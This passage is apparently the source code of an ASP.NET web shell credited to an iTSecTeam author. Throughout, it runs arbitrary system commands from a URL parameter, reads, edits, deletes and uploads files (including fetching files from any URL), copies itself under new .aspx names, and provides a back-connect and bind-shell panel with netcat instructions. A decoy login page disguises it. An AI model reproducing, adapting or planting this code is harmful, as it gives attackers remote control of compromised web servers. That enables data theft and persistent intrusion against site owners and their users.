m.Groups(1).Value End If Dim webcl As WebClient = New WebClient webcl.DownloadFile(fileurl.Value, xcleanpath(xCwd) & uname) End If End If If (Request.QueryString("foldername") <> "") Then Dim fname As String = xcleanpath(Trim(Request.QueryString("foldername"))) If (Not is_dir(newdir & fname)) Then MkDir(newdir & fname) End If ElseIf (Request.QueryString("del") <> "") Then Dim fdel As String = Trim(Request.QueryString("del")) If (is_file(fdel)) Then File.Delete(fdel) ElseIf (is_dir(fdel)) Then xrmdir(fdel) newdir = xparentfolder(fdel) End If ElseIf (Request.QueryString("childname") <> "") Then Dim childname As String = newdir & Trim(Request.QueryString("childname")) Dim con As String = xfileopen(Request.ServerVariables("PATH_TRANSLATED"), False) If (xfilesave(childname, Encoding.ASCII.GetBytes(con))) Then End If End If xCwd = xcleanpath(xCwd) If (Request.QueryString("cmd") <> "") Then Dim cmd As String cmd = Trim(Request.QueryString("cmd")) Dim pos As Integer = InStr(LCase(cmd), "cd ") Dim m As Match = Regex.Match(cmd, "[a-zA-Z]{1}:.*", RegexOptions.IgnoreCase) If pos = 1 Then newdir = Trim(Mid(cmd, 3)) If (newdir = "\") Then xCwd = Mid(xCwd, 1, 3) Else If (InStr(newdir, ":") > 0) Then If (is_dir(newdir)) Then Dim di As New DirectoryInfo(newdir) xCwd = xcleanpath(di.FullName) End If Else If (is_dir(xCwd & newdir)) Then Dim di As New DirectoryInfo(xCwd & newdir) xCwd = xcleanpath(di.FullName) End If End If End If resultbox.InnerHtml = xdir(xCwd) ElseIf m.Success Then Dim ne As String = m.Value If (is_dir(ne)) Then xCwd = xcleanpath(ne) End If resultbox.InnerHtml = xdir(xCwd) Else Dim result As String = ekse(cmd, xCwd) If (result = "") Then resultbox.InnerHtml = xdir(xCwd) Else result = Replace(htmlspecialchars(result), " ", " ") resultbox.InnerHtml = Trim(nl2br(result)) End If End If ElseIf (Request.QueryString("properties") <> "") Then Dim fname As String = xcleanpath(Request.QueryString("properties")) If (Request.QueryString("oldfilename") <> "") Then Dim oldname As String = Request.QueryString("oldfilename") File.Move(oldname, fname) End If Dim Dir As String = Request.QueryString("dir") Dim fcont As String = "" Dim fview As String = "" Dim fsize As String = "" Dim faction As String = "" Dim filectime As String = "" Dim fileatime As String = "" Dim filemtime As String = "" Dim code As String = "" Dim imglink As String = "" If (is_dir(fname)) Then fsize = "DIR" fname = Mid(fname, 1, Len(fname) - 1) fcont = xdir(fname) faction = "<a href=""?dir=" & xcleanpath(fname) & "&properties=" & xcleanpath(fname) & """>Properties</a> | <a href=""?dir=" & xcleanpath(xparentfolder(fname)) & "&del=" & xcleanpath(fname) & """>Remove</a>" Dim di As New DirectoryInfo(fname) filectime = xdateformat(di.CreationTime) fileatime = xdateformat(di.LastAccessTime) filemtime = xdateformat(di.LastWriteTime) Else fname = Mid(fname, 1, Len(fname) - 1) fsize = xparsefilesize(xfilesize(fname)) & " <span class=""gaul"">( </span>" & xfilesize(fname) & " bytes<span class=""gaul""> )</span>" Dim xtype As String = "" Dim mtype As String = "" If (Request.QueryString("type") <> "") Then xtype = Request.QueryString("type") Else mtype = GetFileDescription(fname) Dim s As Match = Regex.Match(mtype, "image|img", RegexOptions.IgnoreCase) If s.Success Then xtype = "img" Else xtype = "text" End If End If If (xtype = "img") Then imglink = "<p><a href=""?img=" & fname & """ target=""_blank""><span class=""gaul"">[ </span>view full size<span class=""gaul""> ]</span></a></p>" fcont = "<div style=""text-align:center;width:100%;"">" & imglink & "<img width=""800"" src=""?img=" & fname & """ alt="""" style=""margin:8px auto;padding:0;border:0;"" /></div>" Else code = htmlspecialchars(xfileopen(fname, False)) fcont = "<div class=""boxcode"">" & nl2br(code) & "</div>" End If Dim fi As New FileInfo(fname) filectime = xdateformat(fi.CreationTime) fileatime = xdateformat(fi.LastAccessTime) filemtime = xdateformat(fi.LastWriteTime) faction = "<a href=""?dir=" & xcleanpath(Dir) & "&view=" & fname & """>Edit</a> | <a href=""?get=" & fname & """>Download</a> | <a href=""?dir=" & xcleanpath(Dir) & "&del=" & fname & """>Remove</a>" fview = "<a href=""?dir=" & xcleanpath(Dir) & "&properties=" & fname & "&type=text""><span class=""gaul"">[ </span>text<span class=""gaul""> ]</span></a><a href=""?dir=" & xcleanpath(Dir) & "&properties=" & fname & "&type=img""><span class=""gaul"">[ </span>image<span class=""gaul""> ]</span></a>" End If Dim fowner As String = xfileowner(fname) Dim fperm As String = xfileperms(fname) resultbox.InnerHtml = "<div style=""display:inline;"">" & _ "<form action=""?"" method=""get"" style=""margin:0;padding:1px 8px;text-align:left;"">" & _ "<input type=""hidden"" name=""dir"" value=""" & xCwd & """ />" & _ "<input type=""hidden"" name=""oldfilename"" value=""" & fname & """ />" & faction & " | " & _ "<span><input style=""width:50%;"" type=""text"" name=""properties"" value=""" & fname & """ /> " & _ "<input style=""width:120px"" class=""btn"" type=""submit"" name=""btnRename"" value=""Rename"" />" & _ "</span>" & _ "<div class=""fprop"">" & _ "Size = " & fsize & "<br />" & _ "Owner = <span class=""gaul"">( </span>" & fowner & "<span class=""gaul""> )</span><br />" & _ "Permission = <span class=""gaul"">( </span>" & fperm & "<span class=""gaul""> )</span><br />" & _ "Create Time = <span class=""gaul"">( </span>" & filectime & "<span class=""gaul""> )</span><br />" & _ "Last Modified = <span class=""gaul"">( </span>" & filemtime & "<span class=""gaul""> )</span><br />" & _ "Last Accessed = <span class=""gaul"">( </span>" & fileatime & "<span class=""gaul""> )</span><br />" & _ fview & _ "</div>" & fcont & _ "</form>" & _ "</div>" ElseIf ((Request.QueryString("view") <> "") Or (Request.QueryString("filename") <> "")) Then Dim msg As String = "" Dim fname As String = "" If (Request.Form("save") = "Save As") Then fname = Trim(Request.Form("saveas")) Dim Content As String = Request.Form("filesource") Dim pesan As String = "" If (xfilesave(fname, Encoding.ASCII.GetBytes(Content))) Then pesan = "File Saved" Else pesan = "Failed to save file" End If msg = "<span style=""float:right;""><span class=""gaul"">[ </span>" & pesan & "<span class=""gaul""> ]</span></span>" Else If (Request.QueryString("view") <> "") Then fname = Trim(Request.QueryString("view")) Else fname = xCwd & Trim(Request.QueryString("filename")) End If End If Dim result As String = xfileopen(fname, False) result = htmlspecialchars(result) resultbox.InnerHtml = "<p style=""padding:0;margin:0;text-align:left;""><a href=""?dir=" & xCwd & "&properties=" & fname & """>" & xfilesummary(fname) & "</a>" & msg & "</p><div style=""clear:both;margin:0;padding:0;""></div>" & _ "<form action=""?dir=" & xCwd & "&view=" & fname & """ method=""post"">" & _ "<textarea name=""filesource"" style=""width:100%;height:200px;"">" & result & "</textarea>" & _ "<input type=""text"" style=""width:80%;"" name=""saveAs"" value=""" & fname & """ /> " & _ "<input type=""submit"" class=""btn"" style=""width:120px;"" name=""save"" value=""Save As"" /></form>" Else resultbox.InnerHtml = xdir(xCwd) End If '//################# Finalizing #######################======================================================] Dim html_title, html_head, html_body, html_onload, html_final, html_script As String If ((Request.QueryString("cmd") <> "") Or (Request.Form("passw") <> "")) Then html_onload = "function setfocus(){ document.getElementById('cmd').focus(); }" Else html_onload = "function setfocus(){ return true; }" End If html_script = "<scrift type=""text/javascript"">" & _ "function updateInfo(boxid,typ){" & _ " if(typ == 0){" & _ " var pola = 'example: (using netcat) run "nc -l -p __PORT__" and then press Connect'; " & _ " }" & _ " else{" & _ " var pola = 'example: (using netcat) press "Listen" and then run "nc " & xServerIP & " __PORT__"'; " & _ " }" & _ "" & _ " var portnum = document.getElementById(boxid).value;" & _ "" & _ " var hasil = pola.replace('__PORT__', portnum);" & _ " document.getElementById(boxid+'_').innerHTML = hasil;" & _ "}" & _ "" & _ "function show(boxid){" & _ " var box = document.getElementById(boxid);" & _ " if(box.style.display != 'inline'){" & _ " document.getElementById('xnewfile').style.display = 'none';" & _ " document.getElementById('xnewfolder').style.display = 'none';" & _ " document.getElementById('xnewupload').style.display = 'none';" & _ " document.getElementById('xnewchild').style.display = 'none';" & _ " document.getElementById('xnewconnect').style.display = 'none';" & _ " box.style.display = 'inline';" & _ " box.focus();" & _ " }" & _ " else box.style.display = 'none';" & _ "}" & _ "function highlighthexdump(address){" & _ " var target = document.getElementById(address);" & _ " target.style.background = '" & shell_color & "';" & _ "}" & _ "function unhighlighthexdump(address){" & _ " var target = document.getElementById(address);" & _ " target.style.background = 'none';" & _ "}" & html_onload & _ "</scrift>" html_script = Replace(html_script, "scrift", "script") html_onload = "" Dim bportC, lportC As String If (auth) Then If (Request.QueryString("bportC") <> "") Then bportC = Request.QueryString("bportC") Else bportC = shell_fav_port End If If (Request.QueryString("lportC") <> "") Then lportC = Request.QueryString("lportC") Else lportC = shell_fav_port End If html_title = shell_title & " " & xCwd html_head = "" & _ "<title>" & html_title & "</title>" & _ "<link rel=""SHORTCUT ICON"" href=""" & Request.ServerVariables("SCRIPT_NAME") & "?img=icon"" />" & _ "" & shell_style & html_script headwrapper.InnerHtml = html_head serverinfo.InnerHtml = xHeader & "" & _ "<div class=""fpath"">" & _ xdrive() & xparsedir(xCwd) & _ "</div>" xnewconnect.InnerHtml = "<form method=""get"" action=""?"" style=""display:inline;margin:0;padding:0;"">" & _ "<table class=""tblBox"" style=""width:100%;"">" & _ "<input type=""hidden"" name=""dir"" value=""" & xCwd & """ />" & _ "<tr><td style=""width:130px;"">BackConnect</td><td style=""width:200px;"">" & _ "Port <input maxlength=""5"" id=""backC"" onkeyup=""updateInfo('backC',0);"" style=""width:60px;"" type=""text"" name=""bportC"" value=""" & bportC & """ />" & _ " <input style=""width:100px;"" type=""submit"" class=""btn"" name=""btnConnect"" value=""Connect"" />" & _ "</td>" & _ "<td><span id=""backC_"" class=""msgcon"">example: (using netcat) run "nc -l -p " & bportC & "" and then press Connect</span></td>" & _ "</tr>" & _ "" & _ "<tr><td>Listen</td><td>" & _ "Port <input maxlength=""5"" id=""listenC"" onkeyup=""updateInfo('listenC',1);"" style=""width:60px;"" type=""text"" name=""lportC"" value=""" & lportC & """ />" & _ " <input style=""width:100px;"" type=""submit"" class=""btn"" name=""btnListen"" value=""Listen"" />" & _ "</td>" & _ "<td><span id=""listenC_"" class=""msgcon"">example: (using netcat) press "Listen" and then run "nc " & xServerIP & " " & lportC & ""</span></td>" & _ "</tr>" & _ "</table>" & _ "</form>" xnewfolder.InnerHtml = "<form method=""get"" action=""?"" style=""display:inline;margin:0;padding:0;"">" & _ "<input type=""hidden"" name=""dir"" value=""" & xCwd & """ />" & _ "<table class=""tblBox"" style=""width:560px;"">" & _ "<tr><td style=""width:120px;"">New Foldername</td><td style=""width:304px;"">" & _ "<input style=""width:300px;"" type=""text"" name=""foldername"" value=""newfolder"" />" & _ "</td><td>" & _ "<input style=""width:100px;"" type=""submit"" class=""btn"" name=""btnNewfolder"" value=""Create"" />" & _ "</td></tr>" & _ "</table>" & _ "</form>" xnewfile.InnerHtml = "<form action=""?"" method=""get"" style=""display:inline;margin:0;padding:0;"">" & _ "<input type=""hidden"" name=""dir"" value=""" & xCwd & """ />" & _ "<table class=""tblBox"" style=""width:560px;"">" & _ "<tr><td style=""width:120px;"">New Filename</td><td style=""width:304px;"">" & _ "<input style=""width:300px;"" type=""text"" name=""filename"" value=""newfile"" />" & _ "</td><td>" & _ "<input style=""width:100px;"" type=""submit"" class=""btn"" name=""btnNewfile"" value=""Create"" />" & _ "</td></tr>" & _ "</table></form>" xnewchild.InnerHtml = "<form method=""get"" action=""?"" style=""display:inline;margin:0;padding:0;"">" & _ "<input type=""hidden"" name=""dir"" value=""" & xCwd & """ />" & _ "<table class=""tblBox"" style=""width:560px;"">" & _ "<tr><td style=""width:120px;"">New Shellname</td><td style=""width:304px;"">" & _ "<input style=""width:300px;"" type=""text"" name=""childname"" value=""" & shell_name & ".aspx""; />" & _ "</td><td><input style=""width:100px;"" type=""submit"" class=""btn"" name=""btnNewchild"" value=""Create"" />" & _ "</td></tr>" & _ "</table>" & _ "</form>" headertop.InnerHtml = "<a href=""?"">" & shell_title & "</a>" uploadform.Action = "?dir=" & xCwd dir.Value = xCwd Else html_title = shell_fake_name html_head = "<title>" & html_title & "</title>" & shell_style html_body = "" & _ "<div style=""margin:30px;"">" & _ "<div>" & _ "<form action=""?"" method=""post"">" & _ "<input id=""cmd"" type=""text"" name=""passw"" value="""" />" & _ " <input type=""submit"" name=""btnpasswd"" value=""Ok"" />" & _ "</form>" & _ "</div>" & _ "<div style=""font-size:10px;"">" & shell_fake_name & "</div>" & _ "</div>" headwrapper.InnerHtml = html_head mainwrapper.InnerHtml = html_body End If End Sub </script> <html> <head id="headwrapper" runat="server"> <title></title> </head> <body onload="setfocus();"> <div id="mainwrapper" runat="server"> <div id="wrapper"> <h1 onmouseover="this.style.cursor='pointer';this.style.cursor='hand';" onclick="window.location= '?';" runat="server" id="headertop"></h1> <div class="box"> <div id="serverinfo" runat="server"></div> <div class="menu"> <a href="javascript:show('xnewfile');"><span class="gaul">[ </span> New File<span class="gaul"> ]</span></a> <a href="javascript:show('xnewfolder');"><span class="gaul">[ </span>New Folder<span class="gaul"> ]</span></a> <a href="javascript:show('xnewchild');"><span class="gaul">[ </span>Replicate<span class="gaul"> ]</span></a> <a href="javascript:show('xnewupload');"><span class="gaul">[ </span>Upload<span class="gaul"> ]</span></a> <a href="javascript:show('xnewconnect');"><span class="gaul">[ </span>BindShell<span class="gaul"> ]</span></a> </div> <div class="hidden" id="xnewconnect" runat="server"></div> <div class="hidden" id="xnewfolder" runat="server"></div> <div class="hidden" id="xnewfile" runat="server"></div> <div class="hidden" id="xnewupload"> <form runat="server" id="uploadform" method="post" action="" enctype="multipart/form-data" style="display:inline;margin:0;padding:0;"> <table class="tblBox" style="width:560px;"> <tr><td style="width:120px;">Save as</td><td><input style="width:300px;" type="text" name="ufname" id="ufname" value="" runat="server" /></td></tr> <tr><td style="width:120px;">From Url</td><td style="width:304px;"> <input style="width:300px;" type="text" name="fileurl" id="fileurl" runat="server" value="" /> </td><td><input style="width:100px;" type="submit" class="btn" name="btnNewUploadUrl" value="Get" /></td></tr> <tr><td style="width:120px;">From Computer</td><td style="width:304px;"> <input style="width:300px;" type="file" name="filelocal" id="filelocal" runat="server" /> </td><td> <input style="width:100px;" type="submit" class="btn" name="btnNewUploadLocal" value="Get" /> </td></tr> </table> </form> </div> <div class="hidden" id="xnewchild" runat="server"> </div> <div class="bottomwrapper"> <div class="cmdbox" id="cmdbox" runat="server"> <form action="?" method="get"> <input type="hidden" name="dir" id="dir" value="" runat="server" /> <table style="width:100%;"><tr> <td style="width:88%;"><input type="text" id="cmd" name="cmd" value="" style="width:100%;" runat="server" /></td> <td style="width:10%;"><input type="submit" class="btn" name="btnCommand" style="width:120px;" value="Execute" /></td></tr></table> </form></div><div class="result" id="resultbox" runat="server"></div></div></div></div></div> </body> </html>
iTSecTeam.comCoded by Amin Shokohi (Pejvak)